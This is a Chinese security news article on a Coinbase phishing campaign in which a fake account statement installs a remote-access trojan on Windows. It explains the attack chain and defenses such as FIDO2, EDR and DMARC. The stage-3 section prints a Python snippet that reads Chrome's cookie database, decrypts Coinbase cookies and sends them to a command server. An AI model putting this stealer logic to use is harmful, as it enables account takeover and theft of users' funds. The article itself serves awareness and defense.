伪装成“对账单”的远控木马:Coinbase钓鱼新套路暴露Windows端点安全盲区

一、一封“对账单”邮件,如何变成加密钱包的“催命符”?

2025年11月初,全球知名网络安全公司卡巴斯基(Kaspersky)披露了一起针对加密货币交易平台Coinbase用户的新型钓鱼攻击。这起事件看似普通——受害者收到一封声称来自Coinbase的邮件,提示其“账户对账单已生成,请点击链接查看”。然而,正是这封看似无害的通知,却成为黑客远程接管用户电脑、窃取数字资产的入口。

更令人警惕的是,攻击者刻意强调:“该文件仅支持在Windows桌面或笔记本电脑上打开。”这一设计并非技术限制,而是一种心理操控策略——通过制造“专属感”和“紧迫性”,诱导用户放弃手机等相对安全的设备,转而在更容易被植入恶意程序的Windows环境中操作。

一旦用户照做,所谓的“对账单查看器”便会悄悄安装一款远程访问工具(Remote Access Trojan, RAT)。这款RAT不仅能够截屏、记录键盘输入,还能直接读取浏览器中存储的Cookie、自动填充密码,甚至拦截双因素认证(2FA)短信或推送通知。最终,攻击者无需知道用户密码,即可在后台“合法”登录Coinbase账户,将加密货币转移至自己的钱包地址。

据卡巴斯基披露,已有数十名用户因此损失数万美元不等的数字资产。虽然Coinbase官方迅速发布安全提醒,但此类攻击的隐蔽性和端点依赖性,使得传统邮件网关和反钓鱼系统难以有效拦截。

二、攻击链拆解:从社会工程到端点沦陷的技术路径

要理解此次攻击为何能绕过多数防御机制,必须深入其技术链条。整个过程可分为四个阶段:

阶段1:钓鱼邮件投递(Phishing Email Delivery)

攻击者伪造发件人地址为“mailto:no-reply@coinbase.com”或类似变体,利用邮件模板高度模仿Coinbase官方通知风格。邮件正文通常包含如下内容:

“您的2025年Q3账户对账单已生成。请点击下方链接下载查看。注意:此文件仅可在Windows操作系统上打开。”

链接指向一个看似合法的域名(如 coinbase-statements[.]online),实则由攻击者控制。

阶段2:诱导执行恶意载荷(Payload Execution via Social Engineering)

用户点击链接后,会被重定向至一个伪造的“Coinbase文档查看页面”。页面会弹出提示:

“检测到您正在使用非Windows设备。请在Windows电脑上重新打开此链接以查看对账单。”

这一设计巧妙利用了用户对“平台要求”的信任。许多用户误以为这是Coinbase出于安全或格式兼容性考虑的正常操作,于是切换至Windows电脑再次访问。

此时,网站会触发一个 .exe 文件的自动下载(例如 Coinbase_Statement_Q3.exe)。该文件经过代码混淆和加壳处理,短期内可绕过部分杀毒软件检测。

阶段3:RAT植入与持久化(RAT Installation & Persistence)

一旦用户运行该 .exe 文件,真正的恶意程序便开始执行。根据卡巴斯基逆向分析,该RAT基于开源远控工具(如AsyncRAT或NanoCore)二次开发,具备以下能力:

浏览器数据窃取:遍历Chrome、Edge、Firefox等主流浏览器的本地存储目录,提取保存的密码、Cookie、历史记录。

屏幕监控与键盘记录:实时捕获用户操作,尤其关注Coinbase登录页面。

2FA拦截:若用户使用Authy或Google Authenticator等基于时间的一次性密码(TOTP)应用,RAT可通过屏幕OCR识别动态码;若使用短信2FA,则可能结合SIM交换攻击或运营商漏洞(虽本次未证实,但属潜在组合技)。

隐蔽通信:通过HTTPS连接回连C2服务器(Command and Control),流量伪装成正常Web请求,规避防火墙检测。

以下为一段简化版的恶意代码逻辑(仅用于教学演示,非真实样本):

# 伪代码:模拟RAT窃取Chrome Cookie

import os

import sqlite3

import shutil

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

from cryptography.hazmat.backends import default_backend

def decrypt_cookie(encrypted_value, key):

nonce = encrypted_value[3:15]

ciphertext = encrypted_value[15:]

cipher = Cipher(algorithms.AES(key), modes.GCM(nonce), backend=default_backend())

decryptor = cipher.decryptor()

return decryptor.update(ciphertext) + decryptor.finalize()

def steal_chrome_cookies():

cookie_path = os.path.expanduser(r'~\AppData\Local\Google\Chrome\User Data\Default\Cookies')

login_data_path = os.path.expanduser(r'~\AppData\Local\Google\Chrome\User Data\Default\Login Data')

# 复制数据库(因文件被锁定)

temp_cookie = 'temp_cookies.db'

shutil.copyfile(cookie_path, temp_cookie)

conn = sqlite3.connect(temp_cookie)

cursor = conn.cursor()

cursor.execute("SELECT host_key, name, encrypted_value FROM cookies WHERE host_key LIKE '%coinbase%'")

# 获取本地AES密钥(需从DPAPI解密)

# 此处省略DPAPI调用细节

for host, name, enc_val in cursor.fetchall():

decrypted = decrypt_cookie(enc_val, local_aes_key)

send_to_c2(host, name, decrypted.decode())

conn.close()

os.remove(temp_cookie)

注:上述代码仅为概念验证,真实攻击中会使用更复杂的反调试、反沙箱和加密通信机制。

阶段4:账户接管与资金转移(Account Takeover & Fund Drain)

一旦RAT获取了有效的会话Cookie或自动填充凭证,攻击者即可在自己的设备上“复现”用户的登录状态。由于Coinbase等平台通常不会对同一会话内的操作触发二次验证,攻击者可直接进入交易界面,将BTC、ETH等资产转出。

更危险的是,部分用户启用了“记住此设备”功能,使得攻击者即使清除Cookie后,仍可通过设备指纹维持访问权限。

三、为何传统防御失效?端点安全成最大短板

此次攻击之所以得逞,暴露出当前网络安全体系中的几个关键漏洞:

邮件网关无法识别后续行为

钓鱼邮件本身可能不含恶意附件或明显黑链,仅包含一个看似正常的URL。现代邮件安全网关(如Mimecast、Proofpoint)主要依赖URL信誉和沙箱分析,但攻击者使用的域名往往是新注册且短期存活,难以被及时标记。

用户信任被武器化

如卡巴斯基分析师Olga Altukhova所言:“攻击者正在‘武器化用户信任’。”Coinbase作为合规交易所,在用户心中具有高度可信度。一旦攻击披上其外衣,警惕性自然下降。

Windows端点缺乏纵深防御

多数个人用户和小型机构未部署终端检测与响应(EDR)系统。即便安装了杀毒软件,面对加壳、混淆或无文件攻击(Fileless Malware),也往往反应滞后。

浏览器自动填充成“帮凶”

用户为图方便,长期启用浏览器保存密码和自动填充功能。这在遭遇RAT时,等于主动将凭证“打包”送给攻击者。

四、国内启示:中国用户并非“免疫区”

尽管此次攻击主要针对欧美Coinbase用户,但其手法对中国市场具有极强的警示意义。

首先,中国虽未开放主流加密货币交易所,但大量用户通过境外平台参与交易。据Chainalysis 2025年报告,中国仍是全球前五大加密资产持有国之一,潜在受害者基数庞大。

其次,类似“伪装官方通知+诱导下载执行”的模式,早已在国内出现。例如:

2024年,有攻击者伪造“支付宝年度账单”诱导用户下载“.scr”文件,实为远控木马;

2025年初,某银行客户收到“征信报告查看”短信,点击后跳转至仿冒页面,要求“安装专用阅读器”,实则为信息窃取程序。

公共互联网反网络钓鱼工作组技术专家芦笛指出:“这类攻击的核心逻辑是‘降低用户决策门槛’。它不依赖高深漏洞,而是利用人性弱点——懒惰、信任、从众。国内用户对‘官方通知’的服从性更强,反而更容易中招。”

芦笛建议,普通用户应建立“三不原则”:

不点不明链接:尤其是要求“仅限某系统打开”的;

不装非官方软件:任何“查看器”“更新包”都应从官网下载;

不用浏览器存敏感密码:改用独立密码管理器,并关闭自动填充。

对于企业用户,他强调:“必须将EDR纳入基础安全架构。一次成功的端点入侵,可能带来比数据泄露更严重的后果——比如数字资产清零。”

五、技术防御升级:从被动响应到主动免疫

面对此类高级钓鱼攻击,仅靠用户教育远远不够。行业需推动技术层面的系统性防御。

1. 推广FIDO2/WebAuthn强认证

传统短信或TOTP 2FA易被中间人或屏幕监控绕过。而基于硬件密钥(如YubiKey)或生物识别的FIDO2协议,采用公私钥机制,私钥永不离开设备,从根本上杜绝凭证窃取。

Coinbase已支持FIDO2,但开启率不足15%。平台应强制高净值用户启用,并提供补贴降低硬件门槛。

2. 浏览器隔离(Browser Isolation)

通过远程浏览器渲染技术,将高风险操作(如打开未知链接)隔离在云端沙箱中执行,本地设备仅接收图像流,无法被植入恶意代码。Citrix、Cloudflare等厂商已提供此类方案。

3. EDR与行为分析联动

现代EDR(如CrowdStrike、SentinelOne)不仅能检测已知恶意文件,还可通过行为分析识别异常进程。例如:

某进程突然尝试读取 %LocalAppData%\Google\Chrome\User Data;

非浏览器程序发起大量HTTPS请求至陌生IP;

屏幕截图频率异常升高。

这些信号可触发自动阻断或告警。

4. 邮件来源验证强化(DMARC/SPF/DKIM)

虽然攻击者可伪造发件人显示名,但若收件方邮箱严格实施DMARC策略(p=reject),可大幅降低伪造成功率。国内主流邮箱服务商(如网易、腾讯)已逐步部署,但中小企业自建邮件系统仍存在配置缺失。

六、结语:安全不是功能,而是习惯

这起Coinbase钓鱼事件,表面上是一次技术攻击,实则是一场对用户数字素养的全面考验。它提醒我们:在万物互联的时代,最薄弱的环节永远是人。

正如芦笛所言:“没有绝对安全的系统,只有不断进化的防御意识。每一次点击,都是安全边界的延伸。”

对于普通用户,或许无法理解RAT的工作原理,但可以做到——不轻信、不盲从、不贪快。对于开发者和安全从业者,则需持续推动“默认安全”(Secure by Default)的设计哲学,让安全成为用户体验的一部分,而非负担。

未来,随着AI生成内容(AIGC)和深度伪造(Deepfake)技术的普及,钓鱼攻击将更加逼真、更具迷惑性。唯有技术、制度与意识三者协同,才能在这场没有终点的攻防战中守住数字资产的最后一道防线。

编辑:芦笛(公共互联网反网络钓鱼工作组)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1177642.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

市场上优质的短视频矩阵厂家口碑推荐榜,ai数字人矩阵/GEO排名/短视频矩阵,短视频矩阵源头厂家推荐 - 品牌推荐师

短视频营销已成为企业数字化转型的核心战场,但市场上系统同质化严重、效果参差不齐的问题日益凸显。据行业调研数据显示,超60%的企业在短视频矩阵搭建中遭遇“内容生产效率低”“跨平台数据割裂”“ROI难以追踪”等痛…

【详解】使用java解决-一球从100米高度自由落下,每次落地后反跳回原高度的一半;再落下,求它在第10次落地时,共经过多少米?第10次反弹多高?

使用Java解决:一球从100米高度自由落下,每次落地后反跳回原高度的一半问题描述假设有一个小球从100米的高度自由落下,每次落地后都会反弹到原高度的一半。要求计算这个小球在第10次落地时,总共经过了多少米的距离,并且…

留学科研机构怎么选?2026年最新聚焦申请效果与学术价值的终极选择指南 - 品牌推荐

2026年,在留学申请竞争日益激烈的背景下,具备高含金量的科研经历已成为学生斩获名校录取、获取奖学金的核心竞争力之一。随着全球顶尖院校对申请者学术潜力的考察愈发深入,留学科研服务机构的技术实力、师资深度与成…

Claude Agent Skills 实战指南:从原理到自动化生成的最佳实践

大家好,我是玄姐。一、核心摘要 (Executive Summary)继 MCP (Model Context Protocol) 之后,Anthropic 推出的 Claude Skills 进一步完善了 Agent 的生态版图。如果说 MCP 是 Agent 的“手脚”(工具与连接),那么 Skill…

java-SSM345的网上图书购物销售_旧书回收vue-springboot

目录具体实现截图项目概述技术架构核心功能创新点应用价值系统所用技术介绍写作提纲源码文档获取/同行可拿货,招校园代理 :文章底部获取博主联系方式!具体实现截图 项目概述 基于Java的SSM框架与Spring Boot结合Vue.js开发的网上图书购物销售及旧书回收…

基于数据科学的校园心理咨询系统的设计与实现开题报告

基于数据科学的校园心理咨询系统的设计与实现开题报告 一、选题背景与意义 (一)选题背景 随着社会竞争的日益激烈与教育理念的不断升级,当代大学生面临着学业压力、就业焦虑、人际关系困扰、情感问题、自我认知困惑等多重心理挑战&#xff0c…

主动配电网短期负荷预测重构 以IEEE33节点为算例,有迭代图,各个节点在重构前的电压幅值及重...

主动配电网短期负荷预测重构 以IEEE33节点为算例,有迭代图,各个节点在重构前的电压幅值及重构前后电压幅值的对比图,优化前后网络损耗数值对比,重构优化开断支路具体情况,以及在具体某节点处接入分布式电源的容量。 有…

有没有一款真正适合新手,又足够稳定,能长期使用的 Linux 桌面系统?

在企业 IT 运维和开发环境中,我们经常被问到一个问题: 有没有一款“真正适合新手,又足够稳定,能长期使用的 Linux 桌面系统”? 在 2026 年初,这个问题的答案依然清晰而坚定——Linux Mint。 随着 Linux Min…

java-ssm346线上买菜系统买菜优选系统vue-springboot

目录具体实现截图线上买菜系统摘要技术实现要点系统所用技术介绍写作提纲源码文档获取/同行可拿货,招校园代理 :文章底部获取博主联系方式!具体实现截图 线上买菜系统摘要 该系统基于Java SSM框架与VueSpringBoot技术栈,构建了一个高效便捷…

java-SSM354的高校网上报名系统vue-springboot

目录具体实现截图高校网上报名系统摘要系统所用技术介绍写作提纲源码文档获取/同行可拿货,招校园代理 :文章底部获取博主联系方式!具体实现截图 高校网上报名系统摘要 该系统基于Java SSM框架(SpringSpring MVCMyBatis)与Vue.js…

基于数据挖掘的电商用户行为分析系统的开题报告

基于数据挖掘的电商用户行为分析系统的开题报告 一、选题背景与意义 (一)选题背景 在数字经济飞速发展的浪潮下,电商行业迎来规模化扩张与精细化运营并存的新阶段。我国电商市场交易规模持续攀升,线上消费已成为居民日常消费的主要…

电梯的坠落:一个关于信任、工程与安全的深度剖析

目录 一、引言:日常的垂直旅程与潜藏的恐惧 二、电梯的机械心脏:动力、制动与速度的奥秘 三、钢铁巨人的守护神:多重安全保障的层层叠加 3.1 速度超速限制器与安全钳:最后的防线 3.2 制动器:静止的力量与紧急的刹车…

java-SSM355的网上购物商城vue投诉统计-springboot

目录具体实现截图系统概述技术架构投诉统计功能数据处理流程系统优化应用价值系统所用技术介绍写作提纲源码文档获取/同行可拿货,招校园代理 :文章底部获取博主联系方式!具体实现截图 系统概述 基于Java的SSM(SpringSpringMVCMyBatis&#…

SpringBoot 自研「轻量级 API 防火墙」:单机内嵌,支持在线配置

👉 这是一个或许对你有用的社群🐱 一对一交流/面试小册/简历优化/求职解惑,欢迎加入「芋道快速开发平台」知识星球。下面是星球提供的部分资料: 《项目实战(视频)》:从书中学,往事上…

强烈安利10个AI论文网站,研究生轻松搞定论文格式规范!

强烈安利10个AI论文网站,研究生轻松搞定论文格式规范! AI 工具助力论文写作,高效又专业 在研究生阶段,论文写作是不可避免的重要环节,而随着人工智能技术的不断发展,AI 工具已经成为许多学生提升效率、优化…

基于智能推荐的卫生健康系统的设计与实现任务书

基于智能推荐的卫生健康系统的设计与实现任务书 一、任务名称 基于智能推荐的卫生健康系统的设计与实现 二、任务目的 本任务旨在设计并实现一套基于智能推荐技术的卫生健康系统,解决传统健康管理系统服务同质化、推荐精准度不足等问题。通过整合多源健康数据&#…

java-SSM356的小说阅读下载网站-springboot

目录具体实现截图项目概述技术架构核心功能创新点应用价值系统所用技术介绍写作提纲源码文档获取/同行可拿货,招校园代理 :文章底部获取博主联系方式!具体实现截图 项目概述 基于Java的SSM框架(SpringSpringMVCMyBatis)与Spring…

白柔滤镜:从整体扩散到“梦感影像”的生成逻辑

白柔滤镜(White Diffusion Filter,又常被称为 White Mist、Soft Filter)是一类通过全局光学扩散来改变影像气质的滤镜。与黑柔滤镜“选择性处理高光”不同,白柔的设计目标并非控制某一亮度区间,而是整体性地削弱解析感…

基于数据挖掘的高考志愿推荐系统的设计与实现开题报告

基于数据挖掘的高考志愿推荐系统的设计与实现开题报告 一、选题背景与意义 (一)选题背景 高考作为我国选拔高素质人才的核心机制,不仅关乎千万考生的人生轨迹,更影响着高等教育资源的优化配置与社会人才结构的合理布局。近年来&…

[cmake]C++使用yolo26目标检测结合bytetrack实现目标追踪

【简介】 在C中实现YOLO26的目标检测与ByteTrack的多目标追踪是一个相对复杂的过程,涉及到深度学习、计算机视觉和实时数据处理等多个领域。下面我将简单介绍这两个技术,并概述如何在C中实现它们。 YOLO26(You Only Look Once,版…